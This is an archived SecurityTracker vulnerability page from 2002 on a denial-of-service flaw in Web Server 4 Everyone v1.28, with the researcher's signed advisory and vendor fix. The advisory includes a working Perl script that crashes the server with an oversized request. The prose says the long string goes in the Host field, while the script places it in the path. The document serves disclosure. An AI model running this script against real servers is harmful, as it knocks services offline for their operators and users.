SecurityTracker.com Archives - WebServer 4 Everyone Bounds Checking Error Lets Remote Users Crash the Server With a Long Host Field

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Web Server/CGI) > WebServer 4 Everyone

Vendors: RadioBird Software

WebServer 4 Everyone Bounds Checking Error Lets Remote Users Crash the Server With a Long Host Field

SecurityTracker Alert ID: 1005470

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: Oct 23 2002

Impact: Denial of service via network

Fix Available: Yes Exploit Included: Yes Vendor Confirmed: Yes

Advisory: SecurityOffice.net

Version(s): 1.28 and prior versions

Description: A denial of service vulnerability was reported in WebServer 4 Everyone. A remote user can send a specially crafted HTTP request to cause the web service to crash.

SecurityOffice.net reported that a remote user can send a request with 2000 characters in the 'Host:' field to cause the web service to crash.

Some demonstration exploit code is provided in the Source Message.

Impact: A remote user can cause the web service to crash.

Solution: The vendor has released a fixed version (1.32), available at:

ftp://ftp.freeware.lt/anonymous/Soft/w4asetup.exe
http://www.freeware.lt/Info/projects.php?Cat=1&ServiceIndex=67&ServiceDetails=68

Vendor URL: www.freeware.lt/Info/projects.php (Links to External Site)

Cause: Boundary error

Underlying OS: Windows (Any)

Reported By: Tamer Sahin <ts@securityoffice.net>

Message History: None.

Source Message Contents

Date: Wed, 23 Oct 2002 12:13:35 +0300
From: Tamer Sahin <ts@securityoffice.net>
Subject: [VulnWatch] [SecurityOffice] Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability

 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: MD5

- --[ Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability ]--

- --[ Type

Denial of Service

- --[ Release Date

October 23, 2002

- --[ Product / Vendor

Web Server 4 Everyone is an Internet and Intranet server that supports HTTP Services.
Web Server 4 Everyone is available for Microsoft Windows operating systems.

http://www.freeware.lt/Info/projects.php

- --[ Summary

The problem is Web Server 4 Everyone v1.28 with bounds checking, when you request 2000
characters "web4all.exe"  just shuts down. This vulnerability also affects Web Server 4
Everyone versions prior to v1.28 for Microsoft Windows 2000.

When the attacker send a request in size of 2000 characters in "Host:" field that contains
all "127.0.0.1", the server  crashes. In case you send a request that size without adding
the "Host:" there is no effect on running program. The Web server must be restarted to
regain normal functionality.

- --[ Exploit

An exploit for this vulnerability exists and is available below.

=============== SNIP ===============

#!/usr/bin/perl -w

use IO::Socket;

$host = $ARGV[0];
$port = $ARGV[1];
$evil = "A" x 2000;

print "Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability by SecurityOffice\
n";
print "Usage: $0 host port\n";
print "Connecting...\n";
$socket = IO::Socket::INET->
            new(Proto=>"tcp",
            PeerAddr=>$host,
            PeerPort=>$port)
            || die "Connection failed.\n";

print "Attacking...\n";
print $socket "GET /$evil HTTP/1.1\n Host: 127.0.0.1\n\n";

close($socket);
print "\nConnection closed. Finished.\n\n";

=============== SNIP ===============

- --[ Tested

Windows 2000 Sp3 / Web Server 4 Everyone v1.28
Windows 98 SE / Web Server 4 Everyone v1.28

- --[ Vulnerable

Web Server 4 Everyone v1.28

- --[ Vendor Status

This vulnerability fixed Web Server 4 Everyone v1.32

- --[ Disclaimer

http://www.securityoffice.net is not responsible for the misuse or illegal use of
any of the information and/or the software listed on this security advisory.

- --[ Author

Tamer Sahin
ts@securityoffice.net
http://www.securityoffice.net

All our advisories can be viewed at http://www.securityoffice.net/articles/

Please send suggestions, updates, and comments to feedback@securityoffice.net

(c) 2002 SecurityOffice

This Security Advisory may be reproduced and distributed, provided that this Security
Advisory is not modified in any way and is attributed to SecurityOffice and provided
that such reproduction and distribution is performed for non-commercial purposes.

Tamer Sahin
http://www.securityoffice.net

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQEVAwUAPbZoQfpL5ibJRTtBAQFQlgf/RK+3BewSrQX6XjB8FjWatCWlEOydKC9I
TB+ULUWKgTOi31J0DFSYTkFQmTLZBt8Z08QHIA3R4KSCRdv9d7UuzkTIcETnwaxO
sDih29SyjysOteW0ikNtRxjQHnZydBqa8v2YRj5iQBnJbirKsPwCL0OPKx17VWZc
9wGiL07gVYVgM7xgARdhkUwXmYLTZk19WCx0ZXBxIyDdl8wTwF9VR6dy33i5vc7C
AIh5CRCS4Z0aYOHt91GF7yrsOZsjppxXMHdiBX5B/F1vJQNMJpxeEd7565NlDdV+
qBUlNkchIYeQt8jLjAlsMC6FQ/9OGrs7Y56UreB9Qj0Ky0xo8sQu+w==
=0MpF
-----END PGP SIGNATURE-----

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2002, SecurityGlobal.net LLC